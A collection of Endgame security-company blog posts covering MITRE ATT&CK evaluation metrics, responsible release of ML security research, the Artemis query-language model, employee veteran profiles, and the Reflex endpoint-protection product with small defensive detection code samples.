    More on that next month, when we look forward to the clickbait machine running in overdrive as NSS Labs releases the 2019 AEP test the week of RSA.


    Here's How We Do The Numbers

    $
    0
    0

    I spoke to a few IT leaders around the HIMSS conference last week. All of them expressed familiarity with the ATT&CK matrix and the recent evaluations, and most of them also confessed to confusion about what really matters. Although they said their teams used the evaluations as part of vendor shortlisting or diligence on their current vendor, few were able to spend time understanding how to interpret the test result data. Even fewer had taken a swipe at analyzing the data published by the ATT&CK team.

    So, Jamie Butler (Endgame CTO) and I got together to lay out a few simple questions that will matter to everyone looking at the MITRE ATT&CK evaluation data. Most importantly, we wanted to make sure that the questions can be answered by the data.

    Rather than asking a one-dimensional “Who’s best” – which doesn’t tell you everything, no matter what anyone tells you – we focused on questions that would be key when implementing or operationalizing a new EDR tool. We settled on:

    1. Who missed the most?
    2. When you miss something, can the product find it later?
    3. When you detect, how useful is the data the product gives me?

    For full transparency and in case you want to play along with the numbers, I’ve posted the scripts to GitHub here. I’ll add the command to generate the output for every chart as the figure description.

    One final grateful shout-out to Forrester’s Josh Zelonis for publishing his analysis scripts back in December, because he saved me a lot of work. Yay for open source and transparency.

     

    Who missed the most?

    Complete Misses

    Figure 1: “python3 total_misses.py”

    This is self-explanatory, and of course no vendor is perfect.

    It should be noted that there is no severity rating for the missed TTP. Some may be more severe than others, and some may be mitigated through operational best practices or other security controls.

     

    When you miss something, can you find it later?

    Crowdstrike recently published their intelligence report and introduced a new metric they are calling “Breakout” speed – the time from an adversary’s initial successful compromise to the next activity; for example, privilege escalation or lateral movement.

    I like to think this relates to the comparable blue team metric “Time to Containment”, so let’s pull some data to look at what APT3 actions were picked up in near-real time, and those that were delayed and introduced a “breakout” window.

    Delayed

    Figure 2: “python3 delayed.py”

    Obviously, it's better to detect everything as close to real time as possible, but let's be honest – that's not possible; things will get through undetected for a while. That's where threat hunting comes in.

    The way the ATT&CK evaluation handles delayed detections is very interesting, because in the ATT&CK assessment a delay meant that the detection data was available but was not immediately raised as an alert. This delay could be due to over-reliance on cloud analysis, maybe the activity was only discovered hours later by a managed service, or perhaps it was discovered by skilled threat hunters.

    Essentially, the more delays here, the harder the work to get the detection alert and the bigger the risk of a “breakout” window. A large number of delays can leave you with all of the uncertainty of a poorly defined managed service, but none of the benefits of an actual managed service.

    Does that mean that a score with ZERO delayed detections is better?

    In a word, no. Given that we already understand it may not be possible to prevent or detect everything, you should expect to see some detections that come from the collection of data. In other words, you’d need to hope that the vendors with zero delays detected everything in real-time (go look at total_misses.py again).

    Organizations that want to reduce exposure want as many detections as possible to arrive as close to real time as possible. Back to the ATT&CK evaluation dataset: let’s pull the number of real-time alerts generated in the evaluation.

    Real Time Alerts

    Figure 3: “python3 real_time.py“

    I don’t think anyone can disagree with real-time alerts being one of the important metrics.

     

    When you detect, how useful is the data you give me?

    The hardest part of a buying process is where organizations have to figure out how endpoint protection vendors can actually help them make faster decisions, take faster containment actions, and reduce the risk of damage and loss. You know, the workflow side of things.

    How much expertise and work do I have to do to scope, triage and respond with zero disruption?

    If a product is throwing up lots of detections but fails to provide the associated events that would help triage and decide on the initial containment step, it’s almost certainly going to be a hard-to-use product.

    Let’s hit the data again to pull the number of detection events that had little associated context.

    Detections Lacking Context

    Figure 4: “python3 no_context.py”

    I’ll quote Jamie Butler, our CTO here:

    “These contextless, basic telemetry detections only give you a bigger pile of hay/data, so what can you do with it? Can you find the bad thing in a list of thousands of process creation events?”

     

    Can this tell you what really matters?

    Yes, well kind of. We already know what matters most in the world of EPP:

    1. Detect more things, faster – You need a good balance of as-real-time-as-possible detections, with low misses.
    2. Find the hard stuff – You need to avoid the low real-time detection rates that are combined with a low (or zero) number of delayed detections. (Are they collecting all of the event data that an EDR tool requires?)
    3. Respond confidently – With too many delayed detections, you must have strong contextual events. If some detection comes in late, you want to act on it fast. Security UX is critical.

    We know that without satisfying all three of those, a detection and response/Security Operations function will be very difficult to implement and operationalize successfully – if at all. We can use these three things to make a final pull from the data.

    The Endgame "What Really Matters" Score

    Figure 5: "python3 what_matters.py"

    Don’t forget that you can look into the numbers yourself. Grab the data from MITRE and run your own analysis; you can see our scripts here, and you can ask us to show you what really matters, too.

    Bar charts. Yay.

    On Military-grade, MITRE ATT&CK™, And You


    To quote our very own Ian McShane (so he doesn’t always have to quote himself), “there are many things US military and commercial organizations don’t have in common: clothes, transportation, hopefully weapons, and seriously different employment agreements.”  

    But the two things they do have in common are: 

    1. MITRE ATT&CK™ - An evolved vision of the adversary must drive protections. 

    MITRE, as an operator of FFRDCs, has only one customer: the US government.  It developed ATT&CK on their behalf to improve knowledge of the modern cyber adversary.  The US government was also Endgame’s first customer. We followed closely the development of MITRE’s ATT&CK model and were the first to incorporate it into our research and engineering – ensuring our solutions had the strategic scope and depth to defend an organization that is attacked relentlessly by the most sophisticated adversaries.   

    2. The people you have right now, not the people you might get somehow, must be immediately effective against the modern adversary.  

    There's only one organization that depends on people with minimal domain experience, whom it gets to keep for only 18 months before it has to start again with new people. Again, same organization: our first customer. With six weeks of basic desktop and network training, and Endgame, they are on the job defending, responding to incidents, and hunting modern adversaries.  

    Our execution on these two requirements is why today we are a standard advanced endpoint protection solution across the US Department of Defense, and it is why we call Endgame’s solution “military-grade.”   

    The need for an evolved understanding of the adversary and the need for immediate productivity have converged for all organizations – both government and commercial. Our customers are leaders in commercial verticals including finserv, fintech, healthcare, oil and gas, mining, manufacturing, and higher education. 

    Endgame is the first and only single-agent endpoint prevention, detection, and response security solution, with coverage across MITRE ATT&CK, that protects autonomously and can be operated by the people you already have.   

    If you’ll be at RSA, we'd be pleased if you would come talk to us at booth 1827 South.  Ian McShane, Mark Dufresne, and Mike Nichols, our Product Marketing, Research, and Product Management leaders, will be there with members of their teams to dig into the MITRE evaluation data and other third-party evaluations and show you the product.  But really, more than anything, to make best use of your time, we’d love to hear from you on these two questions.   

    1. How important is MITRE ATT&CK to your organization?  Zero, growing, fundamental? 

    2. What impact is the lack of available skills having on your team's ability to protect your organization against modern attacks?   

    If you’re not at RSA next week, we are, as ever, very proud to discuss with you what we do and why, perhaps like never before, our military-grade solution is exactly what you ought to have. 

    Why We Release Our Research


    Last week in an unprecedented move, researchers at OpenAI stated that with the announcement of their powerful new language model, they would not be releasing the dataset, code, or model weights due to safety and security concerns. The researchers cited founding principles in the OpenAI charter that predict that “safety and security concerns will reduce our traditional publishing in the future.” The particular fear is that the GPT-2 model could be misused to generate fake news articles at scale, impersonate others, or run phishing campaigns.

    Coincidentally, this news comes almost exactly one year since the release of the Malicious Use of AI Report, co-authored in part by researchers from OpenAI and Endgame. In some security circles such as AI Village, the discussion associated with the GPT-2 model non-release has outweighed that of the initial report. As we noted in our blog post that coincided with the initial report, cybersecurity, with its lack of norms, lies at a critical inflection point in the potential misuse of machine learning, which spans a broad array of fields including misinformation (the concern with GPT-2).

    Endgame researchers, including authors of this post, have a history of releasing models, datasets, code, and papers that could conceivably be used for malicious purposes. As co-authors with OpenAI on the Malicious Use of AI report, how do we justify these releases? What discussions and checks are in place when choosing to (or not to) release? Is a contraction in the sharing of infosec models and code to be expected?

    Deciding to release

    Each decision to release should come after a thoughtful debate about potential social and security impacts. In our case, none of our previously released research openly targeted flaws in software products; rather, it highlighted more general potential blind spots or other causes for concern. We identified and discussed the costs attackers would need to consider, and took care to avoid releasing tools that exploit “low-hanging fruit.” Importantly, for each red-team tactic, we also disclosed blue-team defenses.

    The series of releases has refined a few guiding principles about responsible release that are worth highlighting:

    1. Invite debate that deliberately includes parties with no vested interest in the code release or publication. Although they need not be fatalists, they can help you walk with fresh eyes through worst-case scenarios.
    2. Adopt long-standing and broadly recognized responsible disclosure guidelines that include early notification of impacted parties, generous time before disclosure, and generally acting in good faith.
    3. Expect and embrace public debate and pushback, which is an important socially-rooted check.
    4. Be willing to give the benefit of the doubt to inventors and authors on their decision to release or withhold. There may be additional details or discussion not made public that contribute to the decision. Even while maintaining the public dialog, don’t fall for the fundamental attribution error in ascribing recklessness, greed or malintent.

    Why did we release?

    The reality is most AI/ML research can be leveraged for benign or malicious uses. Technologies like DeepFakes highlight that relatively innocuous research can pivot quickly into nightmare territory. For this reason it is important to acknowledge these concerns by committing to guiding principles such as those mentioned above. This is one net positive from OpenAI withholding the release of their GPT-2 model. Not without criticism, it set a precedent and brought the conversation into the public forum.

    Let’s take two recent examples from Endgame history where models, tools, and frameworks could have been leveraged by threat actors.

    The malware (evasion) gym provided a reinforcement learning approach to manipulate malicious binaries to bypass antimalware machine learning models. This certainly constitutes red-team activity, and abiding by the principles above, we also disclosed the best known defense for the attack. In this case, the machine learning model this project targeted was a “likeness” to commercial NGAV products, not a replica. Abiding by the spirit of responsible disclosure, it represented a very early warning proof-of-concept, not a gaping vulnerability. In reality, it would require a large effort to make this sort of attack successful for adversaries. The fact of the matter is that there are significantly easier, and less costly, ways to evade network or endpoint defenses.

    EMBER is a benchmark dataset and anti-malware model that was released, in part, for adversarial research, and as such could be misused. Giving an adversary the “source code” to a modern machine learning antimalware architecture certainly can aid an attacker, but as in the other cases, education and transparency for researchers and defenders were ultimately paramount. We strongly believe that it is important to shine a bright light on the strengths and weaknesses of ML technologies in the information security domain. In fact, showing weaknesses in models like EMBER can help blue teams mitigate risks when facing a red team. This game-theoretic approach is common across the infosec community and not one that ML research should shy away from.

    A less liberal future?

    Part of the machine learning community is emphasizing reproducibility with open code and model releases. It is all too easy to create a model that’s a little overtrained and cherry-picked, and open release mitigates these issues. This is a wonderful aspect that has drawn many to the community, and it is the source of one of the biggest criticisms of OpenAI’s decision to not release the full model. Based on descriptions of the dataset size and training cost, it’s less likely that GPT-2 is overtrained. But there is a legitimate call for open release.

    However, models that can produce images, text, and audio capable of fooling humans can be harmful. The common practice of reverse image searching a suspected bot’s profile image to find out if it’s a stock photo is completely defeated now with facial GANs. There’s also the disturbing success that the red-team model SNAP_R had in phishing on Twitter. These aren’t vulnerabilities in software that could be patched out; attacks based on these generative models are attacks on human perception. We can educate people not to follow links and not to trust things they read in a Facebook post, but it takes time, and there will always be “unpatched” people who are new to the internet.

    Final thoughts

    Healthy discussion about this continues, and we look forward to more formal forums where we can have discussions about releasing and mitigating dangerous models. Certainly, not every model need be readily available to advance the state of machine learning. If an author feels like their model could be dangerous, there should be a mechanism for them to submit it for review. If the review process validates the science and agrees that the model is dangerous, a report of the model needs to be published which includes a mitigation strategy. It is impossible to “put the genie back in the bottle” once a dangerous model is created. Nation state level actors have the resources to reproduce the full GPT-2, but we should probably not let every script kiddie on the internet have access to it.

    Security sits in an unenviable position. As we have argued before, openness and transparency are adjectives to which our community should aspire. But, where’s the bright line that one shouldn’t cross? We think that line becomes crisper when one abides by the simple guiding principles as we’ve outlined here.

    Going “Deep” with Artemis 3.0


    Over two years ago we announced Artemis, Endgame’s natural language interface to facilitate and expedite detection and response. During that time, we’ve learned how security workers employ the technology and identified some areas for improvement. When Artemis was first released, it exclusively supported the querying of events on the Windows operating system. Those were simpler times, when file names had extensions and process ids were usually multiples of 4. In 2018, we opened up the Artemis interface to events generated by Endgame Linux and OSX sensors. It was a seamless transition for our users, but in the Endgame spirit of continuous improvement, we started seeing ways to make Artemis better.

    For example, if a user were to query “Search process data for apache on linux endpoints”, the language model within Artemis would struggle to understand what apache was supposed to be. To a security worker, it is obvious the user meant for apache to be a process, but to a machine there isn’t much there to make a confident decision. The string apache could be a username or a process name because, prior to the inclusion of Linux/OSX, Artemis was trained to associate extensions with file/process names. Without more specification (i.e., “user apache”) the best Artemis can do is lean toward guessing process name.

    We found that training on the old architecture explained here could produce better recognition of extensionless files. Unfortunately, any gains were offset by the expense of model size, training time, and showstopper misses, making the new model infeasible to deploy.

    BotInspector
    We needed a way to perform an apples-to-apples comparison of potential solutions. This meant building a platform to train, evaluate, and test against a common set of data. We developed BotInspector, a pipeline tool for creating NLU models. BotInspector allows us to quickly train new models using different features or architectures and provides summary statistics. Moreover, it provides a useful comparison view that highlights performance differences between model versions.

    Model Comparison

    The Winner Is...
    Ultimately a deep learning approach won out. Specifically, a Bidirectional Long Short-Term Memory Conditional Random Field (thankfully referred to as BiLSTM-CRF for short) significantly outperformed our original, standard CRF model. Not only was performance better, but the model itself saw a 50x reduction in size (see table below), which enables us to push regular updates to the language model via our cloud services to its home on the Endgame Platform. The main reason for the difference in overall performance was the features being passed to the CRF.

    In our original model the lack of a trained embedding layer forced a ballooning in model size, because the variety and size of the features in the model grew with the variety of vocabulary in the training data. This meant that whatever handcrafted features we tried, e.g. the last three letters of a word, the model would essentially save those features to help out the later classification. It would perform a lookup of a given feature in order to get a number, which would then be placed into the word vector and fed to the CRF. This limited us to smaller handcrafted features so as not to balloon our model. We also needed to augment our handcrafted features with part-of-speech tagging, i.e. adding that a certain word was a verb or plural noun to our feature vector. This added cost, since the part-of-speech tagging was in fact just another large model. All of this added to bloat in our deployments.

    Our new BiLSTM-CRF model still has a CRF as the final step, but it works because we train our own embedding layer, which means our model is saved based on learned similarities of words instead of a straight vectorization of the features themselves. This model acts as a function that turns a tokenized sentence into a per-word array of tag probabilities. In our case these tags are Inside-Outside-Beginning (IOB) tags. The CRF takes these per-word tag probabilities and uses the Viterbi algorithm to produce the most likely path of tags, e.g. “Search for calc.exe” -> “O O B-ENT-FILE”, which Artemis can then send to the EQL powered search functionality in the platform.
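    To make the decoding step concrete, here is a small Python sketch of Viterbi decoding over per-word tag scores. The tag set, emission scores, and transition penalties are invented for the example; the production model learns these during training, so treat this as an illustration of the mechanics rather than our implementation.

    # Toy sketch of the CRF decoding step: Viterbi over per-word tag scores.
    import numpy as np

    TAGS = ["O", "B-ENT-FILE", "I-ENT-FILE"]

    def viterbi(emissions, transitions):
        """emissions: (num_words, num_tags) scores; transitions: (num_tags, num_tags)."""
        n_words, n_tags = emissions.shape
        score = emissions[0].copy()
        backptr = np.zeros((n_words, n_tags), dtype=int)
        for t in range(1, n_words):
            # Best score for each current tag, considering every previous tag.
            candidates = score[:, None] + transitions + emissions[t][None, :]
            backptr[t] = candidates.argmax(axis=0)
            score = candidates.max(axis=0)
        # Walk the backpointers to recover the best tag path.
        path = [int(score.argmax())]
        for t in range(n_words - 1, 0, -1):
            path.append(int(backptr[t][path[-1]]))
        return [TAGS[i] for i in reversed(path)]

    # "Search for calc.exe" -> per-word tag scores from the BiLSTM (fabricated numbers)
    emissions = np.array([
        [0.9, 0.05, 0.05],   # Search
        [0.8, 0.15, 0.05],   # for
        [0.1, 0.85, 0.05],   # calc.exe
    ])
    transitions = np.zeros((3, 3))
    transitions[0, 2] = -10.0  # discourage O -> I-ENT-FILE (an I tag must follow a B tag)

    print(viterbi(emissions, transitions))  # ['O', 'O', 'B-ENT-FILE']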

    Table

    *Weighted avg. of the F1-score generated by scikit-learn’s classification_report

    Moving Forward
    Security software typically just sucks to use. At Endgame, we are driven to learn from the consumer-side of technology and implement trends and tools that make our customers’ lives easier. Our vision is to make Artemis your virtual security assistant, always ready with the information you need at your fingertips. Join us on this journey by trying our newest release, version 3.8!

    Military Appreciation Month: Employee Perspectives


    With observances including Memorial Day, Military Spouse Appreciation Day, and Armed Forces Day, it’s fitting that May has been designated Military Appreciation Month. It’s also a special month to Endgame, as we not only count members of the armed forces as valued customers, but we ARE members of the armed forces. Endgame employees represent all branches of the U.S. military, with some continuing to serve in the National Guard and Reserves.

    To recognize the service of these men and women in uniform, Endgame has partnered with the DC Chapter of Team Red, White, and Blue (Team RWB) in support of the organization’s mission to enrich the lives of veterans by connecting them to the communities they serve. Team RWB has dozens of chapters across the country and more than 115,000 members. While our contribution pales in comparison to the service of these men and women, we are honored by the opportunity to demonstrate our appreciation for the sacrifices they have made – both past and present.

    On Saturday, May 4, we will be hosting members of Team RWB in Arlington, VA for lunch and a private screening of Avengers: Endgame. We couldn’t think of a more fitting way to show thanks to our heroes in uniform than by watching some heroic acts on the big screen!

    We are also thrilled that so many of our employee veterans volunteered to share what their military service means to them. Below are a few of their stories:
     

    Thank you Rick

    RICK HENSLEY
    Sr. Vice President, Customer Success

    Lieutenant Commander, U.S. Navy

    Rick served in the U.S. Navy for 12 years (six active and six reserve) and spent another six years as a civilian with the U.S. Air Force.

    He began his military career serving in the Navy Supply Corps, where he practiced a variety of disciplines including supply management, inventory control and financial management. After six years managing logistics, he left active duty and became a reservist in the Navy and civilian in the Air Force, both roles focused on information warfare.

    What he appreciated most during his service was the opportunity to grow as a leader, further his education, and serve his country while traveling the world. In his words, “I both served and was served by the military.”

    Rick credits much of what he learned about leadership to his time in the Navy. Upon reporting to his first ship in his early 20s he immediately had more than 35 direct reports, some of whom were twice his age. The early career experience taught him at least two critical life lessons: The importance of listening to and learning from senior enlisted personnel regardless of rank, and the value of humility in leading teams.

    “As a veteran, when I see people in uniform I thank them for their service. No service is easy service. I was fortunate to serve outside of wartime, but a lot of service men and women put their lives on the line. It’s important to remember, respect and appreciate that every day because they ensure our freedom.”
     

    Thank you Joe

    JOSEPH PILKINGTON
    Sr. Threat Hunter and Technical Training Manager

    Sergeant E-5, U.S. Army

    Joe served four years in the U.S. Army. He credits the Army with giving his life direction early on and providing a great start to his career.

    There’s a saying in the Army: Right time, right place, right uniform. According to Joe, it’s a lesson he takes to work with him every morning, “The basics are of paramount importance - they show discipline, accountability, and dependability. Things fall into place when you start with a solid foundation.”

    While serving, Joe also learned a lot about team bonding and working together as a cohesive unit. He cites working alongside people from diverse backgrounds, cultures, and ages in an atmosphere where every individual is valuable to the mission as broadening his perspective and appreciation for others’ views. That’s why he’s also proud to count many of the individuals he served with, including his former leadership, among his closest friends today.

    “Without the military I wouldn’t be where I am today. It gave a great start to my career and great values along the way. It was extremely beneficial and I’m still very proud to have made the decision.”
     

    Thank you Rachael

    RACHAEL RIVAS
    Sr. Payroll Accounting Manager

    O-2, U.S. Army

    Rachael joined the Army during her senior year of college and spent eight years in service. While finishing her undergraduate degree in Accounting, Rachael had the opportunity to work at the university she was attending in her field. As a young person entering the workforce, the experience showed her the benefit of an educational background, while also exposing her to the importance and value of personal development.

    Rachael set out to take learning one step further and decided to join the military to commit to serving others, and to pursue travel, character building, and cultural exposure. She viewed Soldiers as an esteemed class of strong, focused, selfless, honorable individuals who lived with an air of integrity and purpose: qualities she knew would enhance the trajectory of her future and serve as a life-long tool.

    After meeting with recruiters from every branch of the U.S. military, the Army became the obvious choice, giving her the opportunity to pursue graduate studies while providing a financial and administrative program that worked with her career path. She learned both leadership and teamwork from military service, including the importance of discipline, communication skills, and focus. In her words, “Being in service instilled in me a mindset of togetherness, which kept me accountable for my individual contribution to the mission, and how that affects others around me. There is strength in numbers!” (Spoken by a “numbers” person!)

    Rachael continues to live into the mantra that there is no “I” in team. The Army gave her the opportunity to learn it young and carry that lifelong lesson of caring about others into her daily interactions. At Endgame, she is conscious of the team, how we grow, what our mission and values are together, and how her contributions map to company goals. What she enjoyed most about her time in service was the camaraderie and unity with people from different walks of life, being able to band together for a shared mission.

    “Service made me a stronger person. I learned that we can accomplish more together than I ever would on my own. I believe that the power of connectivity has no limits.”
     

    Thank you Brian

    BRIAN H WILLIAMS
    Sr. Federal Account Director

    Major, US Air Force

    Brian spent more than 20 years as a Communications and Cyber Operations Officer in the U.S. Air Force – a career he knew he wanted to pursue even as a teenager. He planned to join the Air Force out of high school with an eye toward becoming an air traffic controller. But life had other plans. Lacking an opening for the position he had in mind, Brian pursued an undergraduate degree in computer science and graduated from Louisiana Tech before accepting an Air Force ROTC scholarship to continue his education and join the service.

    What he enjoyed most about his time in the Air Force was the sense of accomplishment in doing something bigger than himself. “I had a lot of friends that graduated with me, taking jobs that made a lot more money. But every time we would deploy – whether it was in a combat zone or for a humanitarian mission – we were doing it for somebody else and something bigger than making a paycheck. I was honored to contribute to the welfare of our country and others around the world.”

    His most important learning? Recognizing that he didn’t have to be the smartest person in the room. Whether he had a unit of 10 people or 10,000 people working for him, he learned the key to success was to intelligently use the resources available to be the most effective and efficient at accomplishing the mission. It’s a lesson Brian applies equally to his career at Endgame and in his personal life.

    “Endgame has a great culture and employs a number of people with military experience. That combination is part of what makes this company so effective. We never say never. Across the board – everybody brings that attitude to the table.”
     

    Thank you Nate

    NATE FICK
    CEO

    Captain, U.S. Marine Corps

    Fresh out of Dartmouth and years before he would write his bestselling book, One Bullet Away, Nate knew he didn’t want to follow the career path that so many of his classmates were on. Banking, law or medicine held little appeal. He knew he wanted to contribute back to society in the form of public service and he wasn’t afraid of a challenge. The opportunity to take on both while gaining a lesson in leadership led him to join the U.S. Marines.

    While on active duty, Nate discovered a knack for building and leading diverse teams under tough circumstances, a role in which he found himself from 1999 to 2004, during the kickoff of the wars in Afghanistan and Iraq. He counts the opportunity to lead teams during those years as the most humbling and gratifying of his career.

    By his estimation, military experience is one of the few places in American life that gives young people a lot of real responsibility. It’s not the only place, of course - being in the Peace Corps or taking on a teaching role in an inner-city school are similar. In each case, it gives a young person the opportunity to be a part of something bigger than themselves.

    One of the questions Nate gets asked regularly is what he learned in business school that he applies to running Endgame. But, he explains, a lot of what he relies on every day he learned in the Marines. And they’re simple things – ones most of us learn in kindergarten: Treat people the way you want to be treated; often times, half the battle is just showing up; and, it’s really all about grit.

    According to Nate, there is no linear path to success. Whether an individual career or building a business over time, things only look linear and smooth in hindsight. The reality is that it can feel like a knife fight every single day. But the role of a leader is to articulate the vision, build the team, establish and maintain the culture, and make sure you equip people to do their jobs.

    People often think of the military as a very hierarchical, top-down organization, but that wasn’t Nate’s experience at all. As a Junior Officer in the Marines, he saw a ton of authority and responsibility delegated out to very junior leaders. And that’s just the template he is using for building and running a fast-paced organization.

    “There isn’t time for centralized decision making. Hire great people, make sure they are operating in shared context, and give them the freedom to do their jobs. It was true in the Marine units I served in and it’s certainly true here at Endgame.”

    What is Reflex?


    We are excited to announce the release of Reflex™. Reflex is the first technology to move customized protection within reach of security teams, combining a flexible architecture, query language, and a host-based execution engine that eliminates the time between detection and response, addressing the “breakout window” across enterprise networks. Reflex runs in-line on the endpoint, with no need for human interaction or confirmation, to stop adversaries before they have the chance to cause damage or loss.

    The purpose of this post is to talk about why we developed Reflex and walk through a few use cases.

    Why is Reflex necessary?

    Expanded protection across ATT&CK

    At Endgame, we’ve built and continue to extend as many behavioral protection layers as possible. We extend protection across the entire MITRE ATT&CK matrix, covering phases of an attack from initial access through to actions on objectives. The idea is that the more layers put in place between an adversary and their objective, the closer to zero the probability that the attacker will move undetected, reducing the time it takes to detect and respond to an incident before significant damage or loss.

    Different adversary techniques require different solutions. Typically, endpoint protection products provide inline preventions for a small subset of an overall attack, focused on blocking initial access, malware-based execution, or fileless techniques like process injection. With the rise of attacker focus on misuse of credentials and legitimate tools like Powershell, that’s not enough. And while this is a significant issue for Windows clients and servers, it is an even bigger problem for defenders protecting on Mac and Linux where malware and exploit detection-based approaches will fail.

    Even the so-called “next-gen” endpoint protection vendors struggle to defend against broader adversary techniques, because they are mostly focused on detections across post-compromise portions of ATT&CK. From the outset, we knew that for Endgame to protect across the widest set of techniques, we needed to deliver the best data through a unique and flexible architecture. We use the Event Query Language (EQL) to process our endpoint telemetry with a set of primitives that take into account complex ancestry and temporal relationships between the entire body of telemetry data on an endpoint. Using this data, we can describe nearly every technique in ATT&CK with precision and generate high-fidelity detections, leading to an enormous increase in the scope of protections we provide – all of which can run in prevention or detection mode.

    Endgame stops the problem; we don’t just tell you about it

    Manual triage, scoping, and response by the SOC are time-consuming and error-prone next steps. Our customers don’t want us to just tell them about problems, they want us to stop problems with high confidence and give them the necessary capability and context to enable their scoping, response, and verification processes.

    Some advanced and budget-rich SOCs are beginning to use security orchestration, automation, and response (SOAR) products to try to take automated preventative actions when certain conditions present themselves. Aside from introducing yet another platform into an already complex set of workflows and processes, this out-of-band approach not only adds latency, it can also be limited and inflexible in terms of outcomes.

    With 98% of our customers choosing Endgame for prevention, we needed to bring prevention technology across the entire MITRE ATT&CK Matrix.

    Customization

    Some endpoint protection vendors claim to allow users to create their own detections - a desirable feature for many organizations, especially for mature teams who have already embraced the death of a one-size-fits-all approach to information security. What you don’t get from any vendor, beyond very basic blacklisting or rudimentary application control features, is the ability to deploy customized preventions. You can use the endpoint agent to stop inline what your vendor lets you stop, and that’s it. Anything else you want to stop happens out-of-band, from seconds to minutes or maybe even hours later.

    Drawbacks of Cloud-Reliance

    Building analytics on top of endpoint telemetry data is not new. The user-creation of detections has been a common selling point for vendors that layer ‘analytics’ on top of a SIEM, and as the EDR market matures, creating rules against the EDR data-lake will become part of the next buzzword-bingo card. The vendors that shout the loudest about data, streaming, and analytics all have one thing in common – an overwhelming reliance on their vendor-owned cloud services. The cloud is great for large scale analytics and threat hunting. You need massive data to develop and noise-test possible detections, whether they’re implemented in EQL or otherwise.

    What the cloud isn’t great for is prevention. It is slow. Data is shipped from endpoint to cloud, run through an analytics engine, and an alert is displayed in a SOC. In the time that takes, a malicious process will often have already completed, and the attacker is off and running. Disconnected endpoints get no protection at all. If any alerts appear they are inherently detection-only, requiring manual response.

    Cloud analytics plus manual response or orchestration is not good enough for prevention. We need to deploy our preventative controls on the endpoint and operate them effectively in-line.

    Reflex in Action

    Reflex enables users to create and deploy protections across MITRE ATT&CK. These protections apply to connected and disconnected endpoints and operate in near real-time.

    Endgame ships with a large number of analytics to detect malicious behaviors with high confidence. Techniques such as misuse of Powershell and other often-abused built-in utilities, spear-phishing as indicated by suspicious child processes of applications like Word, system reconnaissance, stealthy persistence, and much more are handled out-of-the-box via Endgame-provided Reflex analytics. The power of Reflex allows our users to take action to contain and stop the malicious behavior and THEN investigate what happened, as opposed to investigating what is already happening well into the breakout window.

    Our users are exceptionally well protected with what we provide. However, at Endgame we’re committed to giving users the tools they need to create security solutions tailored to their own unique environment. The most exciting capability of Reflex is that users can create their own protections which include a choice of preferred response actions.

    Let’s run through a few examples of Reflex in action.

    Discovery command sequences

    Discovery commands, also referred to as enumeration commands, comprise an entire tactic column of ATT&CK. What is Discovery all about? When an attacker lands on an endpoint, they won’t usually know exactly where they are, what’s around them in the network, and what is on the endpoint. They will often run a set of commands to assess things like where the system can route to, what processes are running, what’s on the filesystem, what user accounts exist, what timezone the machine is in, and much more. This allows the attacker to get a good picture of the value of the system, its suitability for use as a persistent beachhead on the endpoint, and what opportunities may exist for lateral movement. Discovery techniques are a great set of adversary actions for defenders to look for.

    The problem with Discovery is that the commands run by an attacker are commands often run by users and admins. If a user is having network trouble, they may run “ipconfig /all” to look at the network configuration. They may run “tasklist” to look at running processes. And so on. Alerting every time any one of these commands is run would be a false-positive disaster.

    Many attackers will run a series of these commands via a script. This will lead to execution on the endpoint of a set of commands within a certain time window. Performing an analytic for this activity requires maintenance of state, which is very difficult for many products but a core use case for EQL.

    Reflex 1

    The EQL above allows us to look for Discovery commands run within a short window. Our engine maintains state on the endpoint and knows when the customized threshold for alerting is met.

    It is great to have a capability to alert on this, but even better to stop the problem. This custom Reflex could be configured to kill or suspend the parent process, which would be the script host process or shell from which individual Discovery commands, and perhaps other malicious activity, are spawning.
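    The stateful idea itself is simple to illustrate. The toy Python sketch below (purely illustrative; it is neither the EQL in the figure nor the Reflex engine) keeps a sliding window of discovery-style child processes per parent and flags the parent once a threshold is crossed within the window.

    # Toy illustration of stateful Discovery detection: count discovery-style child
    # processes per parent within a time window. Command list, window, and threshold
    # are made-up values for the example.
    from collections import defaultdict, deque

    DISCOVERY = {"ipconfig.exe", "tasklist.exe", "whoami.exe", "net.exe", "systeminfo.exe"}
    WINDOW_SECONDS = 30
    THRESHOLD = 4

    recent = defaultdict(deque)  # parent pid -> timestamps of recent discovery children

    def on_process_event(parent_pid, process_name, timestamp):
        """Return True once this parent crosses the discovery threshold."""
        if process_name.lower() not in DISCOVERY:
            return False
        window = recent[parent_pid]
        window.append(timestamp)
        # Drop events that fall outside the window.
        while window and timestamp - window[0] > WINDOW_SECONDS:
            window.popleft()
        return len(window) >= THRESHOLD

    # Example: a script host (pid 1234) running a recon script
    events = [(1234, "whoami.exe", 0), (1234, "ipconfig.exe", 2),
              (1234, "net.exe", 5), (1234, "tasklist.exe", 7)]
    for pid, name, ts in events:
        if on_process_event(pid, name, ts):
            print(f"discovery burst from parent {pid} at t={ts}s")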


    Spear-phishing

    Spear-phishing is the most common way for adversaries to get initial access to networks. Endgame has many layered capabilities in place to block spear-phishing including MalwareScore for macros, our machine learning-powered malicious document classifier, and a host of Endgame-provided Reflex analytics.

    When an attacker spear-phishes for access, they seek to gain execution on the endpoint. One way this will usually manifest itself in the endpoint data is as a malicious child process of an MS Office application. Process ancestry queries are often difficult to implement in relational database-backed security tools due to the performance impacts of the complex joins they require on backends, but Reflex was designed from the ground up to support process ancestry as a core feature which is easy to express and performant to execute.

    Reflex 2

    The EQL above will fire anytime that Powershell launches anywhere below Word, Excel, or Powerpoint in a process ancestry tree. This simple expression is a great example of the power of EQL. Users might combine this with an automatic, on-the-endpoint action to immediately kill the Powershell process and isolate the likely-compromised endpoint from the network.
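    The ancestry check itself reads naturally as a walk up the process tree rather than as a relational join. Here is a toy Python sketch with a fabricated process table, purely for illustration of the idea:

    # Toy sketch of a process-ancestry check: walk parent links to see whether
    # powershell.exe is running anywhere below an Office application.
    OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

    # pid -> (process name, parent pid); a tiny fabricated process table
    processes = {
        100: ("explorer.exe", 1),
        200: ("winword.exe", 100),
        300: ("cmd.exe", 200),
        400: ("powershell.exe", 300),
    }

    def has_office_ancestor(pid):
        """Return True if any ancestor of pid is an Office application."""
        seen = set()
        _, parent = processes.get(pid, (None, None))
        while parent in processes and parent not in seen:
            seen.add(parent)
            name, grandparent = processes[parent]
            if name.lower() in OFFICE:
                return True
            parent = grandparent
        return False

    for pid, (name, _) in processes.items():
        if name == "powershell.exe" and has_office_ancestor(pid):
            print(f"powershell (pid {pid}) launched below an Office app")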

    Policy Enforcement

